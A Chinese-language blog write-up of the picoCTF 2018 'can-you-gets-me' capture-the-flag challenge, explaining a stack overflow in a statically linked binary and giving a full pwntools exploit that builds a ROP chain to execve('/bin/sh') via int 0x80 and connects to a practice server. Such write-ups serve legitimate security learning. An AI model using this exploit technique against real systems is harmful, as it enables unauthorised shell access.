BUU-picoctf_2018_can_you_gets_me-WP

博主： chuj
发布时间：2020 年 11 月 24 日
910 次浏览
暂无评论
4599字数
分类： CTF-WP

这道题目是比较简单的，但是如果不仔细看的话就会出大事。

<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201124134653.png" alt="" class="wp-image-601"style=""></figure></div>

先检查一下安全措施，可能会注意到使用的命令有变化，这是以为我用的是最新版的checksec，多出了很多我看不懂得安全措施。

我们看到只开了NX。

然后看一下代码，文件非常的大，但是核心函数只有一个vuln

<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201124134537.png" alt="" class="wp-image-602"style=""></figure></div>

自然的我们想到这里有栈溢出漏洞，然后文件里面没有现成的execve或system。比较自然的想法是泄露gets和puts的got表通过libcsearcher来算出system的地址，但是把puts和gets点进去的话会发现他们是静态链接的，泄露表是不可行的，所以考虑用DynELF爆破，但这样真的可以吗？我不知道，一方面我的工具机上recv函数有问题，无法设置超时，另一方面不存在动态链接的时候应该泄露不出来libc。所以换一种方法。文件体积这么庞大，其中的gadgets非常的多，还要int 0x80让我们进入内核，这个时候就可以直接通过系统调用来实现get shell。

<pre class="wp-block-code"><code>mov eax,0x0b
mov ebx,offset bin_sh
mov ecx,0
mov edx,0</code></pre>

这样的汇编代码可以执行shell，我们把它写成rop链就是

<pre class="wp-block-code"><code>payload+=p32(pop_eax)
payload+=p32(0x0b)
payload+=p32(pop_ebx)
...</code></pre>

那么我们只要写入/bin/sh就可以了。在gdb里面看一下可读写的地址

<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201124135914.png" alt="" class="wp-image-603"style=""></figure></div>

写到这里面就可以了。

最后的exp

<pre class="wp-block-code"><code>from pwn import * 
#sh = process("./PicoCTF_2018_can-you-gets-me") 
sh = remote("node3.buuoj.cn","27497")

int_addr = 0x0806cc25 
pop_eax = 0x080b81c6 
pop_ebx = 0x080481c9 
pop_ecx = 0x080de955 
pop_edx = 0x0806f02a 
writebleAddr = 0x80e9000 
getsAddr = 0x0804F120 
 
payload = 'a'*0x18 + 'b'*4 + p32(getsAddr) + p32(pop_eax) + p32(writebleAddr) + p32(pop_eax) + p32(0x0b) + p32(pop_ebx) + p32(writebleAddr) + p32(pop_ecx) + p32(0) + p32(pop_edx) + p32(0) + p32(int_addr)
 
sh.recvuntil("GIVE ME YOUR NAME!") 
sh.sendline(payload) 
 
sh.sendline("/bin/sh\x00") 
sh.interactive() </code></pre>

这道题目是我的 wsl2 pwn的第一题，值得纪念，希望它可以持续工作下去

最后修改：2020 年 12 月 30 日